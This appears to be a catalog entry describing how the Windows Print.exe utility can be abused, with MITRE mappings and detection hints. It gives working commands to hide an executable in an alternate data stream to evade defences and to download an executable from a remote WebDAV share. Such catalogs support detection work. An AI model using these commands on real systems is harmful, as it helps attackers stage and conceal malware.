.. / Print.exe
Star

Used by Windows to send files to the printer


Paths:


Resources:
https://twitter.com/Oddvarmoe/status/985518877076541440
https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410

Acknowledgement:
Oddvar Moe - @oddvarmoe


Detection:
Print.exe getting files from internet
Print.exe creating executable files on disk



Alternate data streams

Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Usecase:Hide binary file in alternate data stream to potentially bypass defensive counter measures
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096



Copy

Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Usecase:Copy files
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1105



Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Usecase:Copy/Download file from remote server
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1105